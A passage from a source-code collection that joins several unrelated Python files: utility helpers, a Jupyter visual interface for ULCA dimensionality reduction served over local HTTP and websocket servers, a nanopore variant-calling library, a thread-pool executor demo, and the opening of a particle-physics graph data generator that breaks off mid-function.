def setup_thread_excepthook():
"""
Workaround for `sys.excepthook` thread bug from:
http://bugs.python.org/issue1230540
Call once from the main thread before creating any threads.
"""
init_original = threading.Thread.__init__
def init(self, *args, **kwargs):
init_original(self, *args, **kwargs)
run_original = self.run
def run_with_except_hook(*args2, **kwargs2):
try:
run_original(*args2, **kwargs2)
except Exception:
sys.excepthook(*sys.exc_info())
self.run = run_with_except_hook
threading.Thread.__init__ = init
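# Usage sketch: call once from the main thread at startup, after which
# uncaught exceptions in worker threads reach sys.excepthook:
#
#   setup_thread_excepthook()
#   threading.Thread(target=some_worker).start()  # some_worker is hypothetical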
def versiontuple(v):
return tuple(map(int, (v.split("."))))
def import_meta(path, validater, load_meta):
try:
with open(path, 'r', encoding='utf-8') as f:
d = validater(json.loads(f.read()))
load_meta(d)
#backwards compatibility for JSONDecodeError
except ValueError:
traceback.print_exc(file=sys.stderr)
raise FileImportFailed(_("Invalid JSON code."))
except BaseException as e:
        traceback.print_exc(file=sys.stderr)
raise FileImportFailed(e)
def export_meta(meta, fileName):
try:
with open(fileName, 'w+', encoding='utf-8') as f:
json.dump(meta, f, indent=4, sort_keys=True)
except (IOError, os.error) as e:
traceback.print_exc(file=sys.stderr)
raise FileExportFailed(e)
def make_dir(path, allow_symlink=True):
"""Make directory if it does not yet exist."""
if not os.path.exists(path):
if not allow_symlink and os.path.islink(path):
raise Exception('Dangling link: ' + path)
os.mkdir(path)
os.chmod(path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
TxMinedStatus = NamedTuple("TxMinedStatus", [("height", int),
("conf", int),
("timestamp", int),
("header_hash", str)])
VerifiedTxInfo = NamedTuple("VerifiedTxInfo", [("height", int),
("timestamp", int),
("txpos", int),
("header_hash", str)])
|
plot.py
|
import copy
import json
import threading
import webbrowser
import numpy as np
import pandas as pd
from enum import IntEnum
from pathlib import Path
from http.server import HTTPServer, SimpleHTTPRequestHandler
from IPython.display import IFrame
from SimpleWebSocketServer import SimpleWebSocketServer, WebSocket
from scipy.spatial.distance import pdist
from ulca_ui.utils.weight_opt import optimize_cost
from ulca_ui.utils.geom_trans import find_best_rotate
class Info():
def __init__(self):
self.verbose = False
self.dr = None
self.X = None
self.y = None
self.w_tg = None
self.w_bg = None
self.w_bw = None
self.alpha = None
self.max_alpha = None
self.Covs = None
        self.w_area = {'move': 0.5, 'scale': 0.5}  # no trailing comma: a dict, not a tuple
self.w_dist = {'move': 0.5, 'scale': 0.5}
self.weight_opt_max_iter = 0
self.feat_names = None
self.y_to_name = None
self.new_comp = {}
def _output_as_json(self):
n_feats, n_comps = self.dr.M.shape
# output Z, y, weights as json
weights = {'tg': None, 'bg': None, 'bw': None}
weights['tg'] = [{
'label': int(key),
'val': float(self.w_tg[key])
} for key in self.w_tg]
weights['bg'] = [{
'label': int(key),
'val': float(self.w_bg[key])
} for key in self.w_bg]
weights['bw'] = [{
'label': int(key),
'val': float(self.w_bw[key])
} for key in self.w_bw]
label_to_name = {'alpha': 'Trade-off'}
for key in self.y_to_name:
label_to_name[int(key)] = str(self.y_to_name[key])
Z = self.dr.transform(self.X)
df_emb = pd.DataFrame({
'x': Z[:, 0],
'y': Z[:, 1],
'label': self.y,
'feat_vals': self.X.tolist()
})
emb = json.loads(df_emb.to_json(orient='records'))
data = {
'weights': weights,
'bounds': [{
'label': 'alpha',
'val': float(self.alpha)
}],
'max_upper_bound': float(self.max_alpha),
'emb': emb,
'components': {
'x': list(self.dr.M[:, 0]),
'y':
list(self.dr.M[:, 1] if n_comps >= 2 else np.zeros((n_feats))),
'feat_names': list(self.feat_names)
},
'label_to_name': label_to_name
}
return data
info = Info()
saved_info = {}
class Message(IntEnum):
updateEmb = 0
optimizeWeights = 1
saveResult = 2
loadResult = 3
initialLoad = 4
addNewComp = 5
    @property
    def key(self):
        return self.name

    @property
    def label(self):
        return self.name
class WsHandler(WebSocket):
def _update_emb(self, content):
# read from records and take only x and y positions
Z_prev = np.array(
pd.DataFrame.from_records(content['data']['emb'])[['x', 'y']])
for key in content['data']['weights']:
for w in content['data']['weights'][key]:
getattr(info, f'w_{key}')[w['label']] = w['val']
for bound in content['data']['bounds']:
if bound['label'] == 'alpha':
info.alpha = bound['val']
info.dr = info.dr.fit(info.X,
y=info.y,
w_tg=info.w_tg,
w_bg=info.w_bg,
w_bw=info.w_bw,
Covs=info.Covs,
alpha=info.alpha)
Z = info.dr.transform(info.X)
if Z_prev.shape[0] > 0:
R = find_best_rotate(Z_prev, Z)
info.dr.update_projector(info.dr.M @ R)
Z = info.dr.transform(info.X)
df_emb = pd.DataFrame({
'x': Z[:, 0],
'y': Z[:, 1],
'label': info.y,
'feat_vals': info.X.tolist()
})
emb = json.loads(df_emb.to_json(orient='records'))
n_feats, n_comps = info.dr.M.shape
comps = {
'x': list(info.dr.M[:, 0]),
'y': list(info.dr.M[:,
1] if n_comps >= 2 else np.zeros((n_feats))),
'feat_names': list(info.feat_names)
}
data = {
'weights': content['data']['weights'],
'bounds': [{
'label': 'alpha',
'val': float(info.alpha)
}],
'max_upper_bound': float(info.max_alpha),
'emb': emb,
'components': comps
}
return json.dumps({'action': Message.updateEmb, 'content': data})
def _optimize_weights(self, content):
with_alpha = True
# read from records and take only x and y positions
Z_prev = np.array(
pd.DataFrame.from_records(content['data']['emb'])[['x', 'y']])
for key in content['data']['weights']:
for w in content['data']['weights'][key]:
getattr(info, f'w_{key}')[w['label']] = w['val']
initial_weights = list(info.w_tg.values()) + list(
info.w_bg.values()) + list(info.w_bw.values())
updated_label = content['data']['updated_label']
w_area = info.w_area[content['data']['interaction']]
w_dist = info.w_dist[content['data']['interaction']]
areas = {}
n_labels = len(content['data']['ellipses'])
ellipse_centers = np.zeros((n_labels, 2))
for i, ellipse in enumerate(content['data']['ellipses']):
label = ellipse['label']
# se_ratio[label] = np.abs(ellipse['rx']) + np.abs(ellipse['ry'])
# skip using pi
areas[label] = np.abs(ellipse['rx']) * np.abs(ellipse['ry'])
ellipse_centers[i, 0] = ellipse['cx']
ellipse_centers[i, 1] = ellipse['cy']
center_dists = pdist(ellipse_centers)
new_weights, cost = optimize_cost(
dr=info.dr,
initial_weights=initial_weights,
updated_label=updated_label,
ideal_areas=areas,
ideal_dists=center_dists,
X=info.X,
y=info.y,
with_alpha=with_alpha,
alpha=info.alpha,
Covs=info.Covs,
w_area=w_area,
w_dist=w_dist,
Z_prev=Z_prev,
apply_geom_trans=True,
n_components=2,
method='COBYLA',
options={'maxiter': info.weight_opt_max_iter})
new_w_tg = {}
new_w_bg = {}
new_w_bw = {}
for i, label in enumerate(info.w_tg):
new_w_tg[label] = new_weights[i]
for i, label in enumerate(info.w_bg):
new_w_bg[label] = new_weights[i + n_labels]
for i, label in enumerate(info.w_bw):
new_w_bw[label] = new_weights[i + n_labels * 2]
if with_alpha:
info.alpha = new_weights[-1]
info.w_tg = new_w_tg
info.w_bg = new_w_bg
info.w_bw = new_w_bw
info.dr = info.dr.fit(info.X,
y=info.y,
w_tg=new_w_tg,
w_bg=new_w_bg,
w_bw=new_w_bw,
Covs=info.Covs,
alpha=info.alpha)
Z = info.dr.transform(info.X)
if Z_prev.shape[0] > 0:
R = find_best_rotate(Z_prev, Z)
info.dr.update_projector(info.dr.M @ R)
Z = info.dr.transform(info.X)
df_emb = pd.DataFrame({
'x': Z[:, 0],
'y': Z[:, 1],
'label': info.y,
'feat_vals': info.X.tolist()
})
emb = json.loads(df_emb.to_json(orient='records'))
n_feats, n_comps = info.dr.M.shape
comps = {
'x': list(info.dr.M[:, 0]),
'y': list(info.dr.M[:,
1] if n_comps >= 2 else np.zeros((n_feats))),
'feat_names': list(info.feat_names)
}
weights = {'tg': None, 'bg': None, 'bw': None}
weights['tg'] = [{
'label': int(key),
'val': float(new_w_tg[key])
} for key in new_w_tg]
weights['bg'] = [{
'label': int(key),
'val': float(new_w_bg[key])
} for key in new_w_bg]
weights['bw'] = [{
'label': int(key),
'val': float(new_w_bw[key])
} for key in new_w_bw]
data = {
'weights': weights,
'bounds': [{
'label': 'alpha',
'val': float(info.alpha)
}],
'max_upper_bound': float(info.max_alpha),
'emb': emb,
'components': comps
}
return json.dumps({'action': Message.optimizeWeights, 'content': data})
def _save_result(self, content):
saved_info[content['name']] = copy.deepcopy(info)
return json.dumps({
'action': Message.saveResult,
'content': {
'dataNames': list(saved_info)
}
})
    def _load_result(self, content):
        global info
        info = copy.deepcopy(saved_info[content['name']])
        data = info._output_as_json()
        return json.dumps({'action': Message.loadResult, 'content': data})
def _initial_load(self):
data = info._output_as_json()
return json.dumps({'action': Message.initialLoad, 'content': data})
def _add_new_component(self, content):
info.new_comp[content['key']] = content['component']
def handleMessage(self):
m = json.loads(self.data)
m_action = m['action']
if m_action == Message.updateEmb:
self.sendMessage(self._update_emb(m['content']))
elif m_action == Message.optimizeWeights:
self.sendMessage(self._optimize_weights(m['content']))
elif m_action == Message.saveResult:
self.sendMessage(self._save_result(m['content']))
elif m_action == Message.loadResult:
self.sendMessage(self._load_result(m['content']))
elif m_action == Message.addNewComp:
self._add_new_component(m['content'])
else:
if info.verbose:
print('received action:', m_action)
def handleConnected(self):
if info.verbose:
print(self.address, 'connected')
self.sendMessage(self._initial_load())
def handleClose(self):
if info.verbose:
print(self.address, 'closed')
class Singleton(object):
def __new__(cls, *args, **kargs):
if not hasattr(cls, '_instance'):
cls._instance = super(Singleton, cls).__new__(cls)
return cls._instance
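# A Singleton subclass always hands back the same instance, e.g.:
#
#   a = Plot()
#   b = Plot()
#   assert a is b  # so the servers started by Plot exist at most once per kernel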
class Plot(Singleton):
"""Class for calling the ULCA visual interface with a Python script
Parameters
----------
http_port: int, optional, (default=8000)
Port used for HTTP server.
ws_port: int, optional, (default=9000)
Port used for Websocket server.
"""
def __init__(self, http_port=8000, ws_port=9000):
# use singleton and the condition below to avoid conflict due to
# usage of the same html server address
if len(vars(self)) == 0:
self.http_port = http_port
self.html_server = None
self.html_server_thread = None
self.ws_port = ws_port
self.ws_server = None
self.ws_server_thread = None
def plot_emb(self,
dr,
X,
y,
w_tg={},
w_bg={},
w_bw={},
Covs={},
alpha=None,
max_alpha=10,
feat_names=None,
y_to_name={},
w_area={
'move': 0.2,
'scale': 0.8
},
w_dist={
'move': 0.8,
'scale': 0.2
},
weight_opt_max_iter=50,
inline_mode=True):
"""Plot ULCA result.
Parameters
----------
dr: ULCA instance.
ULCA instance after applying fit.
X: array-like of shape(n_samples, n_features)
X used when applying fit with ULCA.
y: array-like of shape (n_samples,)
y used when applying fit with ULCA.
w_tg: array-like of shape (n_groups,) or dictionary
w_tg used when applying fit with ULCA.
w_bg: array-like of shape (n_groups,) or dictionary
w_bg used when applying fit with ULCA.
w_bw: array-like of shape (n_groups,) or dictionary
w_bw used when applying fit with ULCA.
Covs: dictionary, optional, (default={})
Covs used when applying fit with ULCA.
alpha: None or float, optional (default=None)
alpha used when applying fit with ULCA.
max_alpha: float, optional (default=10)
maximum value of alpha that can be selected with the slider in UI.
feat_names: None or list of strings, optional (default=None)
If None, numbers from 0 to n_features are assigned as feature names
shown in UI. Otherwise, a list of feature names is used in UI.
        y_to_name: dictionary, optional (default={})
            If empty, 'Label {y_value}' is used as each group's name. Otherwise,
            the dictionary item corresponding to each y value is used as a group
            name (e.g., y_to_name={0: 'Group X', 1: 'Group Y'}).
        w_area: dictionary, optional (default {'move': 0.2, 'scale': 0.8})
r_a in Eq. 12 when moving ('move') or scaling ('scale') of the
confidence ellipse is performed.
        w_dist: dictionary, optional (default {'move': 0.8, 'scale': 0.2})
r_l in Eq. 12 when moving ('move') or scaling ('scale') of the
confidence ellipse is performed.
weight_opt_max_iter: int, optional (default=50)
# of maximum iterations when optimizing Eq. 12.
        inline_mode: bool, optional (default=True)
            If True, show the UI in inline mode (i.e., in the Jupyter
            Notebook's output cell using an HTML IFrame). Otherwise, show the
            UI in a new window in a browser.
Returns
-------
View: IFrame
Examples
-------
        >>> from sklearn import datasets, preprocessing
        >>> from ulca.ulca import ULCA
>>> # prepare data
>>> dataset = datasets.load_wine()
>>> X = dataset.data
>>> y = dataset.target
>>> X = preprocessing.scale(X)
>>> # prepare ULCA and parameters
>>> ulca = ULCA(n_components=2)
>>> w_tg = {0: 0, 1: 0, 2: 0}
>>> w_bg = {0: 1, 1: 1, 2: 1}
>>> w_bw = {0: 1, 1: 1, 2: 1}
>>> # apply ULCA
>>> ulca = ulca.fit(X, y=y, w_tg=w_tg, w_bg=w_bg, w_bw=w_bw)
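        >>> # finally, launch the UI (returns an IFrame when inline_mode=True)
        >>> Plot().plot_emb(ulca, X, y, w_tg=w_tg, w_bg=w_bg, w_bw=w_bw)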
"""
# start html server thread
class HTTPHandler(SimpleHTTPRequestHandler):
def __init__(self, request, client_address, server):
self.directory = Path(__file__).parent
super().__init__(request,
client_address,
server,
directory=self.directory)
            def log_message(self, format, *args):
                # Suppress request logging so nothing is printed in the notebook
                pass
# start html server thread
if self.html_server is None:
try:
self.html_server = HTTPServer(('localhost', self.http_port),
HTTPHandler)
            except OSError:
                # most likely the port is already in use by another kernel
                print('shut down the Jupyter kernel currently using the UI '
                      'before starting the UI in a new notebook')
                return
self.html_server_thread = threading.Thread(
target=self.html_server.serve_forever)
self.html_server_thread.daemon = True
self.html_server_thread.start()
# start websocket server thread
if self.ws_server is None:
try:
self.ws_server = SimpleWebSocketServer('', self.ws_port,
WsHandler)
            except OSError:
                # most likely the port is already in use by another kernel
                print('shut down the Jupyter kernel currently using the UI '
                      'before starting the UI in a new notebook')
                return
self.ws_server_thread = threading.Thread(
target=self.ws_server.serveforever)
self.ws_server_thread.daemon = True
self.ws_server_thread.start()
        # copy the dict arguments so the shared mutable defaults are never mutated
        w_tg, w_bg, w_bw = dict(w_tg), dict(w_bg), dict(w_bw)
        y_to_name = dict(y_to_name)
        if w_tg == {}:
            for label in np.unique(y):
                w_tg[label] = 0
        if w_bg == {}:
            for label in np.unique(y):
                w_bg[label] = 1
        if w_bw == {}:
            for label in np.unique(y):
                w_bw[label] = 1
        if feat_names is None:
            feat_names = list(range(X.shape[1]))
        if y_to_name == {}:
            for label in np.unique(y):
                y_to_name[label] = f'Label {label}'
if alpha is None:
alpha = 1 / dr.get_final_cost()
info.dr = dr
info.X = X
info.y = y
info.w_tg = w_tg
info.w_bg = w_bg
info.w_bw = w_bw
info.alpha = alpha
info.max_alpha = max_alpha if max_alpha > alpha else alpha
info.Covs = Covs
info.w_area = w_area
info.w_dist = w_dist
info.feat_names = feat_names
info.y_to_name = y_to_name
info.weight_opt_max_iter = weight_opt_max_iter
if len(saved_info) == 0:
saved_info['-'] = copy.deepcopy(info)
# load local webpage
url = f'http://localhost:{self.http_port}/'
view = IFrame(src=url, width='100%',
height='500px') if inline_mode else webbrowser.open(url)
return view
def current_info(self):
"""Accessing information the current ULCA result shown in UI.
Returns
-------
Info class instance which has below attributes:
dr
X,
y,
w_tg,
w_bg,
w_bw,
alpha,
max_alpha,
Covs,
w_area,
w_dist,
feat_names,
y_to_name,
weight_opt_max_iter
These attributes correspond to parameters used for plot_emb().
Attributes related to ULCA optimization (w_tg, w_bg, w_bw, alpha) are
        updated during the interactive analysis using UI.
"""
return info
def saved_info(self):
"""Accessing all saved info via saving function in UI.
Returns
-------
Dictionary of Info class instances where key is a name used when saving
and item is the corresponding Info class instances.
        '-' is a special key used to indicate the current Info.
"""
return saved_info
|
variantCallingLib.py
|
#!/usr/bin/env python
"""Library for calling variants
"""
from __future__ import print_function
import sys
import os
import glob
import pandas as pd
import numpy as np
from random import shuffle
from signalAlignLib import SignalAlignment
from alignmentAnalysisLib import CallMethylation
from multiprocessing import Process, Queue, current_process, Manager
from serviceCourse.parsers import read_fasta
from serviceCourse.sequenceTools import reverse_complement
def randomly_select_alignments(path_to_alignments, max_alignments_to_use):
alignments = [x for x in glob.glob(path_to_alignments) if os.stat(x).st_size != 0]
if len(alignments) == 0:
print("[error] Didn't find any alignment files here {}".format(path_to_alignments))
sys.exit(1)
shuffle(alignments)
if len(alignments) < max_alignments_to_use:
return alignments
else:
return alignments[:max_alignments_to_use]
def get_forward_mask(list_of_alignments, suffix):
mask = []
for alignment in list_of_alignments:
if alignment.endswith(".backward.tsv{}".format(suffix)):
mask.append(False)
else:
mask.append(True)
return mask
def get_alignments_labels_and_mask(path_to_alignments, max, suffix=""):
alignments = randomly_select_alignments(path_to_alignments, max)
mask = get_forward_mask(alignments, suffix)
return alignments, mask
def get_reference_sequence(path_to_fasta):
seqs = []
for header, comment, sequence in read_fasta(path_to_fasta):
seqs.append(sequence)
assert len(seqs) > 0, "Didn't find any sequences in the reference file"
if len(seqs) > 1:
print("[NOTICE] Found more than one sequence in the reference file, using the first one")
return seqs[0]
def make_degenerate_reference(input_sequence, positions, forward_sequence_path, backward_sequence_path,
block_size=1):
"""
input_sequence: string, input nucleotide sequence
out_path: string, path to directory to put new sequences with substituted degenerate characters
block_size: not implemented, will be the size of the Ns to add (eg. NN = block_size 2)
:return (subbed sequence, complement subbed sequence)
"""
complement_sequence = reverse_complement(dna=input_sequence, reverse=False, complement=True)
if positions is not None:
t_seq = list(input_sequence)
c_seq = list(complement_sequence)
for position in positions:
t_seq[position] = "X"
c_seq[position] = "X"
t_seq = ''.join(t_seq)
c_seq = ''.join(c_seq)
else:
t_seq = input_sequence
c_seq = complement_sequence
with open(forward_sequence_path, 'w') as f:
f.write("{seq}".format(seq=t_seq))
with open(backward_sequence_path, 'w') as f:
f.write("{seq}".format(seq=c_seq))
return True
def load_variant_call_data(file_path):
    data = pd.read_table(file_path,
                         usecols=(0, 1, 2, 3, 4, 5, 6),
                         names=['site', 'strand', 'pA', 'pC', 'pG', 'pT', 'read'],
                         dtype={'site': np.int64,
                                'strand': str,
                                'pA': np.float64,
                                'pC': np.float64,
                                'pG': np.float64,
                                'pT': np.float64,
                                'read': str,
                                })
    return data
def symbol_to_base(symbol):
return ["A", "C", "G", "T"][symbol]
def rc_probs(probs):
return [probs[3], probs[2], probs[1], probs[0]]
def call_sites_with_marginal_probs(data, reference_sequence_string, min_depth=0, get_sites=False):
d = load_variant_call_data(data)
reference_sequence_list = list(reference_sequence_string)
candidate_sites = []
add_to_candidates = candidate_sites.append
for g, x in d.groupby("site"):
marginal_forward_p = pd.Series(0, ['pA', 'pC', 'pG', 'pT'])
marginal_backward_p = pd.Series(0, ['pA', 'pC', 'pG', 'pT'])
assert(len(x['site'].unique()) == 1)
site = x['site'].unique()[0]
if len(x['read']) < min_depth:
continue
for i, read in x.iterrows():
if ((read['read'].endswith(".forward.tsv") and read['strand'] == 't') or
(read['read'].endswith(".backward.tsv") and read['strand'] == 'c')):
direction = True
else:
direction = False
if direction:
marginal_forward_p += read[['pA', 'pC', 'pG', 'pT']]
else:
marginal_backward_p += read[['pA', 'pC', 'pG', 'pT']]
marginal_prob = marginal_forward_p + rc_probs(marginal_backward_p)
normed_marginal_probs = marginal_prob.map(lambda y: y / sum(marginal_prob))
        called_base = normed_marginal_probs.idxmax()[1]  # e.g. 'pA' -> 'A'
if called_base != reference_sequence_list[site]:
if get_sites is False:
print("Changing {orig} to {new} at {site} depth {depth}"
"".format(orig=reference_sequence_list[site], new=called_base, site=site, depth=len(x['read'])))
reference_sequence_list[site] = called_base
else:
print("Proposing edit at {site} from {orig} to {new}, \n{probs}"
"".format(orig=reference_sequence_list[site], new=called_base, site=site,
probs=normed_marginal_probs))
difference = normed_marginal_probs.max() - normed_marginal_probs["p" + reference_sequence_list[site]]
print(difference)
add_to_candidates((site, difference))
if get_sites is True:
return candidate_sites
else:
return ''.join(reference_sequence_list)
def aligner(work_queue, done_queue):
try:
for f in iter(work_queue.get, 'STOP'):
alignment = SignalAlignment(**f)
alignment.run()
    except Exception as e:
        done_queue.put("%s failed with %s" % (current_process().name, str(e)))
def variant_caller(work_queue, done_queue):
try:
for f in iter(work_queue.get, 'STOP'):
c = CallMethylation(**f)
c.write()
    except Exception as e:
        done_queue.put("%s failed with %s" % (current_process().name, str(e)))
def run_service(service, service_iterable, service_arguments, workers, iterable_argument):
# setup workers for multiprocessing
work_queue = Manager().Queue()
done_queue = Manager().Queue()
jobs = []
for x in service_iterable:
args = dict({iterable_argument: x},
**service_arguments)
work_queue.put(args)
for w in xrange(workers):
p = Process(target=service, args=(work_queue, done_queue))
p.start()
jobs.append(p)
work_queue.put('STOP')
for p in jobs:
p.join()
done_queue.put('STOP')
def make_reference_files_and_alignment_args(working_folder, reference_sequence_string, alignment_args,
n_positions=None):
# make paths for working txt files that contain this STEPs Ns
forward_reference = working_folder.add_file_path("forward_reference.txt")
backward_reference = working_folder.add_file_path("backward_reference.txt")
# make N-ed reference sequence for this iteration, writes the strings to files
check = make_degenerate_reference(reference_sequence_string, n_positions,
forward_reference, backward_reference)
assert check, "Problem making degenerate reference"
# perform alignment for this step
alignment_args["forward_reference"] = forward_reference
alignment_args["backward_reference"] = backward_reference
return True
def scan_for_proposals(working_folder, step, reference_sequence_string, list_of_fast5s, alignment_args, workers):
reference_sequence_length = len(reference_sequence_string)
assert reference_sequence_length > 0, "Got empty string for reference sequence."
# proposals will contain the sites that we're going to change to N
proposals = []
for s in xrange(step):
scan_positions = range(s, reference_sequence_length, step)
check = make_reference_files_and_alignment_args(working_folder, reference_sequence_string,
alignment_args, n_positions=scan_positions)
assert check, "Problem making degenerate reference for step {step}".format(step=s)
run_service(aligner, list_of_fast5s, alignment_args, workers, "in_fast5")
# alignments is the list of alignments to gather proposals from
alignments = [x for x in glob.glob(working_folder.path + "*.tsv") if os.stat(x).st_size != 0]
if len(alignments) == 0:
print("[error] Didn't find any alignment files here {}".format(working_folder.path))
sys.exit(1)
marginal_probability_file = working_folder.add_file_path("marginals.{step}.calls".format(step=s))
proposal_args = {
"sequence": None,
"out_file": marginal_probability_file,
"positions": {"forward": scan_positions, "backward": scan_positions},
"degenerate_type": alignment_args["degenerate"]
}
#for alignment in alignments:
# a = dict({"alignment_file": alignment}, **proposal_args)
# c = CallMethylation(**a)
# c.write()
run_service(variant_caller, alignments, proposal_args, workers, "alignment_file")
# get proposal sites
proposals += call_sites_with_marginal_probs(marginal_probability_file, reference_sequence_string,
min_depth=0, get_sites=True)
# remove old alignments
for f in glob.glob(working_folder.path + "*.tsv"):
os.remove(f)
# proposals is a list of lists containing (position, delta_prob) where position in the position in the
# reference sequence that is being proposed to be edited, and delta_prob is the difference in probability
# of the reference base to the proposed base
return proposals
def update_reference_with_marginal_probs(working_folder, proposals, reference_sequence_string, list_of_fast5s,
alignment_args, workers):
check = make_reference_files_and_alignment_args(working_folder, reference_sequence_string, alignment_args,
n_positions=proposals)
assert check, "[update_reference_with_marginal_probs]: problem making reference files and args dict"
run_service(aligner, list_of_fast5s, alignment_args, workers, "in_fast5")
alignments = [x for x in glob.glob(working_folder.path + "*.tsv") if os.stat(x).st_size != 0]
marginal_probability_file = working_folder.add_file_path("proposals.calls")
proposal_args = {
"sequence": None,
"out_file": marginal_probability_file,
"positions": {"forward": proposals, "backward": proposals},
"degenerate_type": alignment_args["degenerate"]
}
#for alignment in alignments:
# a = dict({"alignment_file": alignment}, **proposal_args)
# c = CallMethylation(**a)
# c.write()
run_service(variant_caller, alignments, proposal_args, workers, "alignment_file")
    # get the updated reference sequence (get_sites=False returns the edited string)
    updated_reference_sequence = call_sites_with_marginal_probs(marginal_probability_file, reference_sequence_string,
                                                                min_depth=0, get_sites=False)
# clean up
working_folder.remove_file(marginal_probability_file)
# remove old alignments
for f in glob.glob(working_folder.path + "*.tsv"):
os.remove(f)
return updated_reference_sequence
|
event_based_asynchronous.py
|
""" Referred to concurrent.futures.thread and concurrent.futures._base """
import itertools
import queue
import time
import threading
from typing import Any, Callable, Iterable, Optional, Union
def lprint(*args, **kwargs):
if not hasattr(lprint, 'print_lock'):
lprint.print_lock = threading.Lock()
with lprint.print_lock:
print(*args, **kwargs)
class _WorkItem:
def __init__(self, fn: Callable, callback: Callable, args: Iterable, kwargs: dict):
self.fn = fn
self.callback = callback
self.args = args
self.kwargs = kwargs
def run(self):
res = self.fn(*self.args, **self.kwargs)
if callable(self.callback):
self.callback(res)
class Executor:
_counter = itertools.count().__next__
    def __init__(self, max_worker: Optional[int] = None):
self.max_worker = max_worker or 4
self._work_queue = queue.SimpleQueue()
self._threads = set()
self.lock = threading.Lock()
self._shutdown = False
def submit(self, fn: Callable, callback: Callable, *args, **kwargs):
""" Make a reservation to call `fn` with `callback` """
with self.lock:
work = _WorkItem(fn, callback, args, kwargs)
name = f'[Thread-Exe({self._counter()})]'
self._work_queue.put(work)
self._spawn_executor(name)
def _spawn_executor(self, name: str):
if len(self._threads) < self.max_worker:
thr = threading.Thread(target=self._executor, name=name)
thr.start()
self._threads.add(thr)
def _executor(self):
while True:
work: Union[_WorkItem, None] = self._work_queue.get(block=True)
if work is not None:
work.run()
continue
if self._shutdown:
# Notify other executors too
self._work_queue.put(None)
break
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
with self.lock:
self._shutdown = True
# Wake up executor
self._work_queue.put(None)
for thr in self._threads:
thr.join()
return False
def sum_of_pow(num):
    """ Time consuming process: sums the integers up to num**num """
    total = 0  # avoid shadowing the builtin sum()
    start = time.time()
    for i in range(pow(num, num) + 1):
        total += i
        time.sleep(0.01)
    res = round(time.time() - start, 4), total
    return res
def callback(res: Any):
lprint('Result: ', res)
def main():
# Implemented `callback` instead of `Future`
with Executor() as executor:
for num in [2, 4, 3, 1]:
executor.submit(sum_of_pow, callback, num)
if __name__ == '__main__':
main()
|
data_infer.py
|
import numpy as np
import glob
import os
import uproot as ur
import time
from multiprocessing import Process, Queue, set_start_method
import compress_pickle as pickle
from scipy.stats import circmean
import random
class MPGraphDataGenerator:
"""DataGenerator class for extracting and formating data from list of root files"""
def __init__(self,
pi0_file_list: list,
pion_file_list: list,
cellGeo_file: str,
batch_size: int,
shuffle: bool = True,
num_procs = 32,
preprocess = False,
output_dir = None):
"""Initialization"""
self.preprocess = preprocess
self.output_dir = output_dir
if self.preprocess and self.output_dir is not None:
self.pi0_file_list = pi0_file_list
self.pion_file_list = pion_file_list
assert len(pi0_file_list) == len(pion_file_list)
self.num_files = len(self.pi0_file_list)
else:
self.file_list = pi0_file_list
self.num_files = len(self.file_list)
self.cellGeo_file = cellGeo_file
self.cellGeo_data = ur.open(self.cellGeo_file)['CellGeo']
self.geoFeatureNames = self.cellGeo_data.keys()[1:9]
self.nodeFeatureNames = ['cluster_cell_E', *self.geoFeatureNames[:-2]]
self.edgeFeatureNames = self.cellGeo_data.keys()[9:]
self.num_nodeFeatures = len(self.nodeFeatureNames)
self.num_edgeFeatures = len(self.edgeFeatureNames)
self.meta_features = ['file_name', 'event_ind', 'cluster_ind', 'cluster_E', 'cluster_Pt', 'cluster_EM_PROBABILITY',
'cluster_Eta', 'cluster_Phi', 'cluster_nCells', 'cluster_ENG_CALIB_TOT', 'type']
self.cellGeo_data = self.cellGeo_data.arrays(library='np')
self.cellGeo_ID = self.cellGeo_data['cell_geo_ID'][0]
self.sorter = np.argsort(self.cellGeo_ID)
self.batch_size = batch_size
        self.shuffle = shuffle
        # self.file_list only exists here in non-preprocess mode; in preprocess
        # mode it is assigned later by preprocess_data()
        if self.shuffle and hasattr(self, 'file_list'):
            np.random.shuffle(self.file_list)
self.num_procs = num_procs
self.procs = []
if self.preprocess and self.output_dir is not None:
os.makedirs(self.output_dir, exist_ok=True)
self.preprocess_data()
def get_cluster_calib(self, event_data, event_ind, cluster_ind):
""" Reading cluster calibration energy """
cluster_calib_E = event_data['cluster_ENG_CALIB_TOT'][event_ind][cluster_ind]
if cluster_calib_E <= 0:
return None
return np.log10(cluster_calib_E)
def get_nodes(self, event_data, event_ind, cluster_ind):
""" Reading Node features """
cell_IDs = event_data['cluster_cell_ID'][event_ind][cluster_ind]
cell_IDmap = self.sorter[np.searchsorted(self.cellGeo_ID, cell_IDs, sorter=self.sorter)]
nodes = np.log10(event_data['cluster_cell_E'][event_ind][cluster_ind])
global_node = np.log10(event_data['cluster_E'][event_ind][cluster_ind])
# Scaling the cell_geo_sampling by 28
nodes = np.append(nodes, self.cellGeo_data['cell_geo_sampling'][0][cell_IDmap]/28.)
for f in self.nodeFeatureNames[2:4]:
nodes = np.append(nodes, self.cellGeo_data[f][0][cell_IDmap])
# Scaling the cell_geo_rPerp by 3000
nodes = np.append(nodes, self.cellGeo_data['cell_geo_rPerp'][0][cell_IDmap]/3000.)
for f in self.nodeFeatureNames[5:]:
nodes = np.append(nodes, self.cellGeo_data[f][0][cell_IDmap])
nodes = np.reshape(nodes, (len(self.nodeFeatureNames), -1)).T
cluster_num_nodes = len(nodes)
return nodes, np.array([global_node]), cluster_num_nodes, cell_IDmap
def get_edges(self, cluster_num_nodes, cell_IDmap):
"""
Reading edge features
        Returns senders, receivers, and edges
"""
edge_inds = np.zeros((cluster_num_nodes, self.num_edgeFeatures))
for i, f in enumerate(self.edgeFeatureNames):
edge_inds[:, i] = self.cellGeo_data[f][0][cell_IDmap]
edge_inds[np.logical_not(np.isin(edge_inds, cell_IDmap))] = np.nan
senders, edge_on_inds = np.isin(edge_inds, cell_IDmap).nonzero()
cluster_num_edges = len(senders)
edges = np.zeros((cluster_num_edges, self.num_edgeFeatures))
edges[np.arange(cluster_num_edges), edge_on_inds] = 1
cell_IDmap_sorter = np.argsort(cell_IDmap)
        rank = np.searchsorted(cell_IDmap, edge_inds, sorter=cell_IDmap_sorter)
receivers = cell_IDmap_sorter[rank[rank!=cluster_num_nodes]]
return senders, receivers, edges
def get_meta(self, event_data, event_ind, cluster_ind):
"""
Reading meta data
        Returns a list of meta data values for the cluster
"""
meta_data = []
meta_data.append(event_ind)
meta_data.append(cluster_ind)
for f in self.meta_features[3:-1]:
